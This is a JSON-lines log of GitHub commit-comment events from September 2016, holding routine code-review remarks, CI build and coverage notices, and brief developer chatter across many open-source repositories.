{"id":"4594855938","type":"CommitCommentEvent","actor":{"login":"sagar-acharya"},"repo":{"name":"alankarmore/gabicus"},"payload":{"comment":{"id":19110191,"position":90,"line":32,"path":"app/controllers/Auth/AuthController.php","commit_id":"fdb8a227bf58302a4f9d95603c76b2ec425dda07","created_at":"2016-09-21T08:45:42Z","updated_at":"2016-09-21T08:45:42Z","body":"Are you talking about conditional if/else in ProfileController? If yes then then i'll change it! or let me know the change if it's not what i'm talking about\n\n\nSagar Acharya\n[+91-8793979572]\n[1470338585931_facebook.png]<https://www.facebook.com/bladebrakers>[1470338640572_twitter.png]<https://www.twitter.com/SaggyA>[1470338655086_linkedin.png]<https://www.linkedin.com/in/imsagar>[1470338601267_skype.png]<https://is.gd/LgkhyR>\n[1470338683360_wordpress.png]<http://blog.sagaracharya.com>[1470338692756_instagram.png]<https://www.instagram.com/new_sagar>[1470338663955_github.png]<https://github.com/sagar-acharya>\n\n\n\n________________________________\nFrom: alankarmore <notifications@github.com>\nSent: Wednesday, September 21, 2016 1:29 PM\nTo: alankarmore/gabicus\nSubject: Re: [alankarmore/gabicus] Merge pull request #4 from alankarmore/profile_management (fdb8a22)\n\n\nCan we put this code in service Instead of controller.\n\n-\nYou are receiving this because you are subscribed to this thread.\nReply to this email directly, view it on GitHub<https://github.com/alankarmore/gabicus/commit/fdb8a227bf58302a4f9d95603c76b2ec425dda07#commitcomment-19109577>, or mute the thread<https://github.com/notifications/unsubscribe-auth/AHE5CDpmlK26eeJd1emRLzTvT6YCI8Tjks5qsOPhgaJpZM4KCgW->.\n"}},"created_at":"2016-09-21T08:45:42Z"}
{"id":"4594857742","type":"CommitCommentEvent","actor":{"login":"elebescond"},"repo":{"name":"SIGSEV/minus"},"payload":{"comment":{"id":19110193,"position":null,"line":null,"path":null,"commit_id":"758c874421cf5193e7a9fff26446d2ea66e82ee9","created_at":"2016-09-21T08:46:03Z","updated_at":"2016-09-21T08:46:03Z","body":"Very interesting comments... now I understand this choice :-)\r\n\r\nC'est le farwest tout ça !"}},"created_at":"2016-09-21T08:46:03Z"}
{"id":"4594861321","type":"CommitCommentEvent","actor":{"login":"webYouth"},"repo":{"name":"webYouth/firstGroup"},"payload":{"comment":{"id":19110198,"position":null,"line":null,"path":null,"commit_id":"2edf85588d7aab52312a5b615ca9a9a7b5ad3021","created_at":"2016-09-21T08:46:38Z","updated_at":"2016-09-21T08:46:38Z","body":"这是徐文燕写的登录注册"}},"created_at":"2016-09-21T08:46:38Z"}
{"id":"4594862927","type":"CommitCommentEvent","actor":{"login":"bleskes"},"repo":{"name":"s1monw/elasticsearch"},"payload":{"comment":{"id":19110203,"position":64,"line":1292,"path":"core/src/main/java/org/elasticsearch/index/engine/InternalEngine.java","commit_id":"e4e3d6853a6677bc7441e4c29e69e09b8e382984","created_at":"2016-09-21T08:46:53Z","updated_at":"2016-09-21T08:46:53Z","body":"we typically throw IllegalShardStateException in these cases. Long term, I think we should not expose the engine on the primary until it's recovered from the translog, but that's a bigger change.."}},"created_at":"2016-09-21T08:46:53Z"}
{"id":"4594863220","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19110204,"position":null,"line":null,"path":null,"commit_id":"a39cb8801b330a8be3e1d050842eb86c5d78d897","created_at":"2016-09-21T08:46:56Z","updated_at":"2016-09-21T08:46:56Z","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1767 of 1767 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a39cb8801b330a8be3e1d050842eb86c5d78d897-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a39cb8801b330a8be3e1d050842eb86c5d78d897-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a39cb8801b330a8be3e1d050842eb86c5d78d897-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.14%25-green.svg)</a>\n"}},"created_at":"2016-09-21T08:46:56Z"}
{"id":"4594863623","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19110206,"position":null,"line":null,"path":null,"commit_id":"e61f1c621d6213ba5573198bbfea47f91b51e23c","created_at":"2016-09-21T08:47:00Z","updated_at":"2016-09-21T08:47:00Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1078](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13710&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-21T08:47:00Z"}
{"id":"4594870002","type":"CommitCommentEvent","actor":{"login":"s1monw"},"repo":{"name":"s1monw/elasticsearch"},"payload":{"comment":{"id":19110212,"position":64,"line":1292,"path":"core/src/main/java/org/elasticsearch/index/engine/InternalEngine.java","commit_id":"e4e3d6853a6677bc7441e4c29e69e09b8e382984","created_at":"2016-09-21T08:47:58Z","updated_at":"2016-09-21T08:47:58Z","body":"I don't  agree. this is an illlegal state in the engine. I check this on the IndexShard end and throw IllegalShardStateException. this is hte second line of defence"}},"created_at":"2016-09-21T08:47:58Z"}
{"id":"4594870868","type":"CommitCommentEvent","actor":{"login":"lizhaohan001"},"repo":{"name":"icela/FriceEngine"},"payload":{"comment":{"id":19110213,"position":null,"line":null,"path":null,"commit_id":"43812c3b01f6b0abcd9d975bf45dad6b86f207e5","created_at":"2016-09-21T08:48:06Z","updated_at":"2016-09-21T08:48:06Z","body":"庆祝啊... ....Star破40了\r\n\r\n> 电脑课自由活动的感觉就是好... ..."}},"created_at":"2016-09-21T08:48:06Z"}
{"id":"4594870889","type":"CommitCommentEvent","actor":{"login":"bleskes"},"repo":{"name":"s1monw/elasticsearch"},"payload":{"comment":{"id":19110214,"position":64,"line":1292,"path":"core/src/main/java/org/elasticsearch/index/engine/InternalEngine.java","commit_id":"e4e3d6853a6677bc7441e4c29e69e09b8e382984","created_at":"2016-09-21T08:48:06Z","updated_at":"2016-09-21T08:48:06Z","body":"never mind. Saw the isRecovering() protection. "}},"created_at":"2016-09-21T08:48:06Z"}
{"id":"4594873473","type":"CommitCommentEvent","actor":{"login":"KosKam"},"repo":{"name":"KosKam/test5"},"payload":{"comment":{"id":19110219,"position":1,"line":1,"path":"README.md","commit_id":"1e84098bd40d4a1ecfaddfc175a71c46cc735045","created_at":"2016-09-21T08:48:30Z","updated_at":"2016-09-21T08:48:30Z","body":"This is old"}},"created_at":"2016-09-21T08:48:30Z"}
{"id":"4594875723","type":"CommitCommentEvent","actor":{"login":"segunadeleye"},"repo":{"name":"damilola-dealdey/HtmlTrack"},"payload":{"comment":{"id":19110220,"position":151,"line":151,"path":"form.html","commit_id":"bc826727de425df7cd0a13ff2938b099cf994331","created_at":"2016-09-21T08:48:52Z","updated_at":"2016-09-21T08:48:52Z","body":"It's important to always remove unnecessary new lines"}},"created_at":"2016-09-21T08:48:52Z"}
{"id":"4594876412","type":"CommitCommentEvent","actor":{"login":"KosKam"},"repo":{"name":"KosKam/test5"},"payload":{"comment":{"id":19110222,"position":2,"line":2,"path":"UpDate README.md","commit_id":"1e84098bd40d4a1ecfaddfc175a71c46cc735045","created_at":"2016-09-21T08:48:59Z","updated_at":"2016-09-21T08:48:59Z","body":"This is new\r\n"}},"created_at":"2016-09-21T08:48:59Z"}
{"id":"4594878397","type":"CommitCommentEvent","actor":{"login":"juiced"},"repo":{"name":"BelledonneCommunications/linphone-iphone"},"payload":{"comment":{"id":19110226,"position":null,"line":null,"path":null,"commit_id":"5a785b7b9d41b0ede7d29ba4fcdbd21441d75d0b","created_at":"2016-09-21T08:49:24Z","updated_at":"2016-09-21T08:49:24Z","body":"It will take some time to wrap your head around it. You can find all the documentation there is next to the code in the directories and in comments in for example the linphone core API header files.\r\nHow are you trying to compile the SDK? Using what commands for example?"}},"created_at":"2016-09-21T08:49:24Z"}
{"id":"4594879107","type":"CommitCommentEvent","actor":{"login":"paceholder"},"repo":{"name":"MigFerreira/nodeeditor"},"payload":{"comment":{"id":19110230,"position":12,"line":216,"path":"src/NodeGraphicsObject.cpp","commit_id":"9ebda26996a5a9a0b98f7b20abc06b58706df80b","created_at":"2016-09-21T08:49:33Z","updated_at":"2016-09-21T08:49:33Z","body":"Maybe I do not see your point. Why would you need a newly created node to be selected?"}},"created_at":"2016-09-21T08:49:33Z"}
{"id":"4594879774","type":"CommitCommentEvent","actor":{"login":"floam"},"repo":{"name":"fish-shell/fish-shell"},"payload":{"comment":{"id":19110231,"position":44,"line":90,"path":"configure.ac","commit_id":"06c658dd5e8d331badd0589274e061b28e1eaac8","created_at":"2016-09-21T08:49:41Z","updated_at":"2016-09-21T08:49:41Z","body":"FreeBSD has gcc and clang, but unless you pick clang you get an ancient compiler.  Since clang is newer that seems  not a perfect heirostic but an ok one.\r\n\r\nAlso gcc is often a clang symlink -  now it should tell you what compiler we are using. "}},"created_at":"2016-09-21T08:49:41Z"}
{"id":"4594881201","type":"CommitCommentEvent","actor":{"login":"seav"},"repo":{"name":"Cadasta/cadasta-platform"},"payload":{"comment":{"id":19110239,"position":1,"line":266,"path":"cadasta/organization/forms.py","commit_id":"d5ae6a2c444bb01ac94cb658dde4de2f74d8814d","created_at":"2016-09-21T08:50:01Z","updated_at":"2016-09-21T08:50:01Z","body":"OK. I'll add the filter and a test (or two) for superusers."}},"created_at":"2016-09-21T08:50:01Z"}
{"id":"4594883757","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19110247,"position":null,"line":null,"path":null,"commit_id":"ab5d7e8009ec6a9811e26376a7e98ee4a56ee7d5","created_at":"2016-09-21T08:50:31Z","updated_at":"2016-09-21T08:50:31Z","body":"fixBranchTransition (mitchute) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ab5d7e8009ec6a9811e26376a7e98ee4a56ee7d5-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-21T08:50:31Z"}
{"id":"4594885557","type":"CommitCommentEvent","actor":{"login":"bleskes"},"repo":{"name":"s1monw/elasticsearch"},"payload":{"comment":{"id":19110253,"position":24,"line":753,"path":"core/src/main/java/org/elasticsearch/index/shard/IndexShard.java","commit_id":"e4e3d6853a6677bc7441e4c29e69e09b8e382984","created_at":"2016-09-21T08:50:52Z","updated_at":"2016-09-21T08:50:52Z","body":"I wonder how difficult it will be to not expose the engine in this state...  `internalPerformTranslogRecovery` calls `createNewEngine` , which also exposes the engine to the outside by setting `currentEngineReference`.  Maybe it's easier to only set `currentEngineReference` once the engine is fully recovered? then we want need the flag, right?"}},"created_at":"2016-09-21T08:50:52Z"}
{"id":"4594890100","type":"CommitCommentEvent","actor":{"login":"floam"},"repo":{"name":"fish-shell/fish-shell"},"payload":{"comment":{"id":19110267,"position":44,"line":90,"path":"configure.ac","commit_id":"06c658dd5e8d331badd0589274e061b28e1eaac8","created_at":"2016-09-21T08:51:45Z","updated_at":"2016-09-21T08:51:45Z","body":"(because clang++ almost never is a g++ symlink)"}},"created_at":"2016-09-21T08:51:45Z"}
{"id":"4594892647","type":"CommitCommentEvent","actor":{"login":"meriadec"},"repo":{"name":"SIGSEV/minus"},"payload":{"comment":{"id":19110271,"position":12,"line":14,"path":"README.md","commit_id":"42b94ed0195ae84737a86200f62ac1c346c00747","created_at":"2016-09-21T08:52:15Z","updated_at":"2016-09-21T08:52:15Z","body":"I guess just saying `**100%** ES6/ES7` is fine. The \"Babel 6\" drama has ended now."}},"created_at":"2016-09-21T08:52:15Z"}
{"id":"4594895693","type":"CommitCommentEvent","actor":{"login":"bleskes"},"repo":{"name":"s1monw/elasticsearch"},"payload":{"comment":{"id":19110277,"position":21,"line":389,"path":"core/src/main/java/org/elasticsearch/indices/IndexingMemoryController.java","commit_id":"e4e3d6853a6677bc7441e4c29e69e09b8e382984","created_at":"2016-09-21T08:52:54Z","updated_at":"2016-09-21T08:52:54Z","body":"this is great"}},"created_at":"2016-09-21T08:52:54Z"}
{"id":"4594900236","type":"CommitCommentEvent","actor":{"login":"pronebird"},"repo":{"name":"delannoyk/AYVibrantButton"},"payload":{"comment":{"id":19110289,"position":1,"line":1,"path":"AYVibrantButton.podspec","commit_id":"23b0ff8bb3e30b901ce1c8c0ac057124a0c0bfd7","created_at":"2016-09-21T08:53:52Z","updated_at":"2016-09-21T08:53:52Z","body":"I cannot compile it since commit `a280e53e6dee1a78803d60a14c6a95be901635bd`."}},"created_at":"2016-09-21T08:53:52Z"}
{"id":"4594907419","type":"CommitCommentEvent","actor":{"login":"dignifiedquire"},"repo":{"name":"karma-runner/karma-html2js-preprocessor"},"payload":{"comment":{"id":19110298,"position":null,"line":null,"path":null,"commit_id":"c89b01cdaab19243c79c6196990ed5d33ac058e2","created_at":"2016-09-21T08:55:20Z","updated_at":"2016-09-21T08:55:20Z","body":"Done, sorry about that, I was waiting to get the publish rights on npm"}},"created_at":"2016-09-21T08:55:20Z"}
{"id":"4594908501","type":"CommitCommentEvent","actor":{"login":"pascalbetz"},"repo":{"name":"hanami/model"},"payload":{"comment":{"id":19110299,"position":null,"line":null,"path":null,"commit_id":"cc3067b89c491953e8e10101b27d283b3efdb3cb","created_at":"2016-09-21T08:55:33Z","updated_at":"2016-09-21T08:55:33Z","body":"👍"}},"created_at":"2016-09-21T08:55:33Z"}
{"id":"4594908708","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19110301,"position":5,"line":402,"path":"plugins/VersionUpgrade/VersionUpgrade21to22/VersionUpgrade21to22.py","commit_id":"d391639b48e3e3adc3af6c935e7595490ed4025a","created_at":"2016-09-21T08:55:36Z","updated_at":"2016-09-21T08:55:36Z","body":"Did you check whether 2.1 did indeed act like that?\r\nI have a hunch that 2.1 had the fan on the regular fan speed on the second layer while the setting said 0."}},"created_at":"2016-09-21T08:55:36Z"}
{"id":"4594909328","type":"CommitCommentEvent","actor":{"login":"Alucard24"},"repo":{"name":"Alucard24/Alucard-Kernel-LG-G5"},"payload":{"comment":{"id":19110303,"position":null,"line":null,"path":null,"commit_id":"0522e8da0438f1be80fb4a50cc05d626c6b8b9bb","created_at":"2016-09-21T08:55:44Z","updated_at":"2016-09-21T08:55:44Z","body":"Thanks :) I just took your commit regarding modem ...... So it remains to fix only mic during video recording, right? I will take a look into.... this evening when I come back home.\r\nThanks again.\r\n\r\nP.S. maybe I have to restore old vidc drivers too...\r\n\r\n"}},"created_at":"2016-09-21T08:55:44Z"}
{"id":"4594912215","type":"CommitCommentEvent","actor":{"login":"gtyun"},"repo":{"name":"protodef/agens-graph"},"payload":{"comment":{"id":19110305,"position":null,"line":null,"path":null,"commit_id":"452ff4d12b5b58ce1e184833cd6d3d0a21ca1a1a","created_at":"2016-09-21T08:56:18Z","updated_at":"2016-09-21T08:56:18Z","body":"Is there any reason(performance?) for change right join to left join?\r\nJust curiosity.\r\nThank you for review."}},"created_at":"2016-09-21T08:56:18Z"}
{"id":"4594913012","type":"CommitCommentEvent","actor":{"login":"goldbergtatyana"},"repo":{"name":"PokemonGoers/PredictPokemon-2"},"payload":{"comment":{"id":19110307,"position":null,"line":null,"path":null,"commit_id":"6014fc5741bb9b599e28f53e63e0d287df05253e","created_at":"2016-09-21T08:56:28Z","updated_at":"2016-09-21T08:56:28Z","body":"Having most cases is great! Can you please give us a number for what most cases mean?\r\n\r\nFor missing cases the arff file should then contain a question mark \"?\"."}},"created_at":"2016-09-21T08:56:28Z"}
{"id":"4594916662","type":"CommitCommentEvent","actor":{"login":"Apercu"},"repo":{"name":"SIGSEV/minus"},"payload":{"comment":{"id":19110316,"position":12,"line":14,"path":"README.md","commit_id":"42b94ed0195ae84737a86200f62ac1c346c00747","created_at":"2016-09-21T08:57:11Z","updated_at":"2016-09-21T08:57:11Z","body":"Indeed"}},"created_at":"2016-09-21T08:57:11Z"}
{"id":"4594918828","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19110320,"position":null,"line":null,"path":null,"commit_id":"e61f1c621d6213ba5573198bbfea47f91b51e23c","created_at":"2016-09-21T08:57:29Z","updated_at":"2016-09-21T08:57:29Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1078](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13710&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 245, ignored: 3 Build time: 00:10:29"}},"created_at":"2016-09-21T08:57:29Z"}
{"id":"4594928710","type":"CommitCommentEvent","actor":{"login":"bubobot"},"repo":{"name":"bubobox/parse-js"},"payload":{"comment":{"id":19110328,"position":null,"line":null,"path":null,"commit_id":"4d316480af93d11b670ce8b28c5116948005b0f6","created_at":"2016-09-21T08:59:00Z","updated_at":"2016-09-21T08:59:00Z","body":"[Code coverage](https://125-47334959-gh.circle-artifacts.com/0//home/ubuntu/parse-js/coverage/lcov-report/index.html) is currently at **100%**"}},"created_at":"2016-09-21T08:59:00Z"}
{"id":"4594930628","type":"CommitCommentEvent","actor":{"login":"Kami"},"repo":{"name":"StackStorm/st2"},"payload":{"comment":{"id":19110330,"position":16,"line":49,"path":"st2common/st2common/runners/__init__.py","commit_id":"48c662fadaa84e9b4e4862342a92f58e28b6601d","created_at":"2016-09-21T08:59:18Z","updated_at":"2016-09-21T08:59:18Z","body":"For security reasons please use `os.path.join`."}},"created_at":"2016-09-21T08:59:18Z"}
{"id":"4594931111","type":"CommitCommentEvent","actor":{"login":"vitorgalvao"},"repo":{"name":"caskroom/homebrew-cask"},"payload":{"comment":{"id":19110332,"position":null,"line":null,"path":null,"commit_id":"62411526cb4cf2dc96286e9bc08f92031715c239","created_at":"2016-09-21T08:59:23Z","updated_at":"2016-09-21T08:59:23Z","body":"Thank you @vdh. [Removed](https://github.com/caskroom/homebrew-cask/commit/b106d43eb0795095a24d2e74894401ee66643a5a)."}},"created_at":"2016-09-21T08:59:23Z"}
{"id":"4594932553","type":"CommitCommentEvent","actor":{"login":"AntumDeluge"},"repo":{"name":"AntumDeluge/debreate"},"payload":{"comment":{"id":19110336,"position":5,"line":0,"path":"dbr/__init__.py","commit_id":"6c7517b5cb8d5f3f44ff62fbcdb94e115d8a85e5","created_at":"2016-09-21T08:59:37Z","updated_at":"2016-09-21T08:59:37Z","body":"I would prefer to keep trailing whitespace, it helps me keep track of indentation & makes the code feel more organized."}},"created_at":"2016-09-21T08:59:37Z"}
{"id":"4594934456","type":"CommitCommentEvent","actor":{"login":"hudokkow"},"repo":{"name":"hudokkow/xbmc"},"payload":{"comment":{"id":19110337,"position":null,"line":null,"path":null,"commit_id":"f3df1d8404e59cd215c7d0437263a3983f59938c","created_at":"2016-09-21T08:59:55Z","updated_at":"2016-09-21T08:59:55Z","body":"Failing add-ons complain about\r\n\r\n> CMake Error at CMakeLists.txt:16 (find_package):\r\n  By not providing \"FindMinGW.cmake\" in CMAKE_MODULE_PATH this project has\r\n  asked CMake to find a package configuration file provided by \"MinGW\", but\r\n  CMake did not find one.\r\n\r\n  > Could not find a package configuration file provided by \"MinGW\" with any of\r\n  the following names:\r\n\r\n   > MinGWConfig.cmake\r\n    mingw-config.cmake\r\n\r\n  > Add the installation prefix of \"MinGW\" to CMAKE_PREFIX_PATH or set\r\n  \"MinGW_DIR\" to a directory containing one of the above files.  If \"MinGW\"\r\n  provides a separate development package or SDK, be sure it has been\r\n  installed.\r\n\r\n> -- Configuring incomplete, errors occurred!\r\n\r\nand that's weird. It didn't complained about it last time I built your branch after reverting the 2 commits you cherry-picked."}},"created_at":"2016-09-21T08:59:55Z"}
{"id":"4594934893","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19110338,"position":5,"line":144,"path":"src/settings/settings.cpp","commit_id":"4bea7d8ba231e15f506a9fb9a201a8eeedba6686","created_at":"2016-09-21T08:59:58Z","updated_at":"2016-09-21T08:59:58Z","body":"The check below is now unnecessary.\r\nI think this change only makes the code less robust to faulty parameters."}},"created_at":"2016-09-21T08:59:58Z"}
{"id":"4594936905","type":"CommitCommentEvent","actor":{"login":"Airborn22"},"repo":{"name":"Airborn22/vakvarju"},"payload":{"comment":{"id":19110341,"position":null,"line":null,"path":null,"commit_id":"95eb1cebeddb484d31dc4338917a1c66155ae3a6","created_at":"2016-09-21T09:00:16Z","updated_at":"2016-09-21T09:00:16Z","body":"![Szeptember 21. - Szerda](http://ujlipot.vakvarju.com/data/napimenu/22.jpg?v=1474278110)\nTejfeles karfiolkrémleves\r\nBolognai spagetti füstölt sajttal\r\nMákosguba"}},"created_at":"2016-09-21T09:00:16Z"}
{"id":"4594938626","type":"CommitCommentEvent","actor":{"login":"jigsawpieces"},"repo":{"name":"RaisingITDev/codeclips"},"payload":{"comment":{"id":19110348,"position":null,"line":null,"path":null,"commit_id":"7c714a889fd551581d3318207ef29ff14c4b4b60","created_at":"2016-09-21T09:00:33Z","updated_at":"2016-09-21T09:00:33Z","body":"@sm-ll \r\n\r\nyou can get git to ignore the .sass-cache directory as we don't need this to be committed. You just have to add a .gitignore file to your root directory with these lines: https://gist.github.com/mynameispj/10143204"}},"created_at":"2016-09-21T09:00:33Z"}
{"id":"4594938759","type":"CommitCommentEvent","actor":{"login":"thankjura"},"repo":{"name":"Heather/gentoo-gnome"},"payload":{"comment":{"id":19110349,"position":null,"line":null,"path":null,"commit_id":"fa6a6cc8cd7592fb0d03d7008bc622b26660a1c5","created_at":"2016-09-21T09:00:35Z","updated_at":"2016-09-21T09:00:35Z","body":"@mpkh А с муттером разбирался, не могу скомпилять его без wayland"}},"created_at":"2016-09-21T09:00:35Z"}
{"id":"4594938938","type":"CommitCommentEvent","actor":{"login":"AntumDeluge"},"repo":{"name":"AntumDeluge/debreate"},"payload":{"comment":{"id":19110350,"position":5,"line":0,"path":"init.py","commit_id":"1af5fb42dcaa4da8cb9c6c683409ce8e88b018a4","created_at":"2016-09-21T09:00:37Z","updated_at":"2016-09-21T09:00:37Z","body":"I am glad you caught this."}},"created_at":"2016-09-21T09:00:37Z"}
{"id":"4594939926","type":"CommitCommentEvent","actor":{"login":"rjmunro"},"repo":{"name":"diffblue/cbmc"},"payload":{"comment":{"id":19110352,"position":30,"line":992,"path":"src/test_gen/java_test_source_factory.cpp","commit_id":"cd0338b07e1d30939533afdd0f0ea53012033fb9","created_at":"2016-09-21T09:00:46Z","updated_at":"2016-09-21T09:00:46Z","body":"@mgudemann Typo: Should be constructor (with an s)."}},"created_at":"2016-09-21T09:00:46Z"}
{"id":"4594946290","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19110357,"position":5,"line":109,"path":"src/FffGcodeWriter.cpp","commit_id":"b03a7bd9eed767b417f7020e82d544fedb8fd2e4","created_at":"2016-09-21T09:01:59Z","updated_at":"2016-09-21T09:01:59Z","body":"Note that `getSettingAsCount` was already wrong to begin with. It should have been `getSettingAsIndex`.\r\n\r\nThis change is ok, though."}},"created_at":"2016-09-21T09:01:59Z"}
{"id":"4594948040","type":"CommitCommentEvent","actor":{"login":"bubobot"},"repo":{"name":"bubobox/parse-js"},"payload":{"comment":{"id":19110362,"position":null,"line":null,"path":null,"commit_id":"950f6921c3b1b35215b1b6df1bf6e6ed6766f37e","created_at":"2016-09-21T09:02:22Z","updated_at":"2016-09-21T09:02:22Z","body":"[Code coverage](https://126-47334959-gh.circle-artifacts.com/0//home/ubuntu/parse-js/coverage/lcov-report/index.html) is currently at **100%**"}},"created_at":"2016-09-21T09:02:22Z"}
{"id":"4594948880","type":"CommitCommentEvent","actor":{"login":"RyanSkraba"},"repo":{"name":"Talend/tcommon-studio-se"},"payload":{"comment":{"id":19110364,"position":5,"line":112,"path":"main/plugins/org.talend.metadata.managment.ui/src/main/java/org/talend/metadata/managment/ui/utils/OtherConnectionContextUtils.java","commit_id":"d303379ccbcf3a0608ccdaa7af0f654fc536844b","created_at":"2016-09-21T09:02:32Z","updated_at":"2016-09-21T09:02:32Z","body":"These constants are still used in https://github.com/Talend/tcommon-studio-ee/blob/master/main/plugins/org.talend.repository.brms/src/org/talend/repository/brms/ui/wizards/AbstractBRMSFileStepForm.java#L143 in *master* (as of https://github.com/Talend/tcommon-studio-ee/commit/1c38288363c1e316985165de3e35ccf4d74bec51)."}},"created_at":"2016-09-21T09:02:32Z"}
{"id":"4594948965","type":"CommitCommentEvent","actor":{"login":"sendilkumarn"},"repo":{"name":"jhipster/generator-jhipster"},"payload":{"comment":{"id":19110365,"position":5,"line":19,"path":"generators/client-2/templates/_package.json","commit_id":"ac9031c08e142ea3f5690dbd43285d04d52f1033","created_at":"2016-09-21T09:02:33Z","updated_at":"2016-09-21T09:02:33Z","body":"Isn't this `version 4` 😕 "}},"created_at":"2016-09-21T09:02:33Z"}
{"id":"4594950538","type":"CommitCommentEvent","actor":{"login":"floam"},"repo":{"name":"fish-shell/fish-shell"},"payload":{"comment":{"id":19110368,"position":46,"line":92,"path":"configure.ac","commit_id":"06c658dd5e8d331badd0589274e061b28e1eaac8","created_at":"2016-09-21T09:02:54Z","updated_at":"2016-09-21T09:02:54Z","body":"This line can go away actually - we never call the C preprocessor l directly "}},"created_at":"2016-09-21T09:02:54Z"}
{"id":"4594951617","type":"CommitCommentEvent","actor":{"login":"jigsawpieces"},"repo":{"name":"RaisingITDev/codeclips"},"payload":{"comment":{"id":19110370,"position":null,"line":null,"path":null,"commit_id":"caeee4b3192553d0e80af6123c3084b7db6048e1","created_at":"2016-09-21T09:03:08Z","updated_at":"2016-09-21T09:03:08Z","body":"😬 try to not use !important if possible!\r\n\r\nif you're trying to style .readMore buttons on homepage, most of those styles live in https://github.com/RaisingITDev/codeclips/blob/epiccic/buttons/buttons.scss"}},"created_at":"2016-09-21T09:03:08Z"}
{"id":"4594951624","type":"CommitCommentEvent","actor":{"login":"segunadeleye"},"repo":{"name":"damilola-dealdey/HtmlTrack"},"payload":{"comment":{"id":19110371,"position":56,"line":56,"path":"form.html","commit_id":"bc826727de425df7cd0a13ff2938b099cf994331","created_at":"2016-09-21T09:03:08Z","updated_at":"2016-09-21T09:03:08Z","body":"The `<b>` tag is deprecated. There is a better alternative."}},"created_at":"2016-09-21T09:03:08Z"}
{"id":"4594953570","type":"CommitCommentEvent","actor":{"login":"sendilkumarn"},"repo":{"name":"jhipster/generator-jhipster"},"payload":{"comment":{"id":19110375,"position":8,"line":6,"path":"generators/client-2/templates/src/main/webapp/app/shared/_shared-libs.ng2module.ts","commit_id":"ac9031c08e142ea3f5690dbd43285d04d52f1033","created_at":"2016-09-21T09:03:30Z","updated_at":"2016-09-21T09:03:30Z","body":"I don't think this will also work. This remains the same. Please revert"}},"created_at":"2016-09-21T09:03:30Z"}
{"id":"4594954610","type":"CommitCommentEvent","actor":{"login":"GrahamCampbell"},"repo":{"name":"bugsnag/bugsnag-php"},"payload":{"comment":{"id":19110376,"position":12,"line":12,"path":"example/php-expanded/index.php","commit_id":"78197f6c2566f406d94b3823f750d6e50998c5e3","created_at":"2016-09-21T09:03:44Z","updated_at":"2016-09-21T09:03:44Z","body":"Using the global keyword is a bad practice."}},"created_at":"2016-09-21T09:03:44Z"}
{"id":"4594955169","type":"CommitCommentEvent","actor":{"login":"Mounica13"},"repo":{"name":"Mounica13/Samplehubrepo"},"payload":{"comment":{"id":19110378,"position":null,"line":null,"path":null,"commit_id":"7fd23c294902e66b3095a13757302f7f3cffa2e9","created_at":"2016-09-21T09:03:51Z","updated_at":"2016-09-21T09:03:51Z","body":"S-01004"}},"created_at":"2016-09-21T09:03:51Z"}
{"id":"4594957428","type":"CommitCommentEvent","actor":{"login":"adrianpietka"},"repo":{"name":"rspective/voucherify-php-sdk"},"payload":{"comment":{"id":19110382,"position":10,"line":10,"path":"CustomerBuilder.php","commit_id":"041663ad2104fb77ef1626afe6fd8f120bcbdd26","created_at":"2016-09-21T09:04:17Z","updated_at":"2016-09-21T09:04:17Z","body":"or creating object using stdClass.\r\n\r\n```\r\n$this->_customer = new stdClass();\r\n```"}},"created_at":"2016-09-21T09:04:17Z"}
{"id":"4594958053","type":"CommitCommentEvent","actor":{"login":"daviesjamie"},"repo":{"name":"CapacitorSet/box-js"},"payload":{"comment":{"id":19110385,"position":null,"line":null,"path":null,"commit_id":"715e5c8b074a42296c1a4692bfcf0906806fff2c","created_at":"2016-09-21T09:04:25Z","updated_at":"2016-09-21T09:04:25Z","body":"I think you've accidentally left the `update-docs` script out of the commit?"}},"created_at":"2016-09-21T09:04:25Z"}
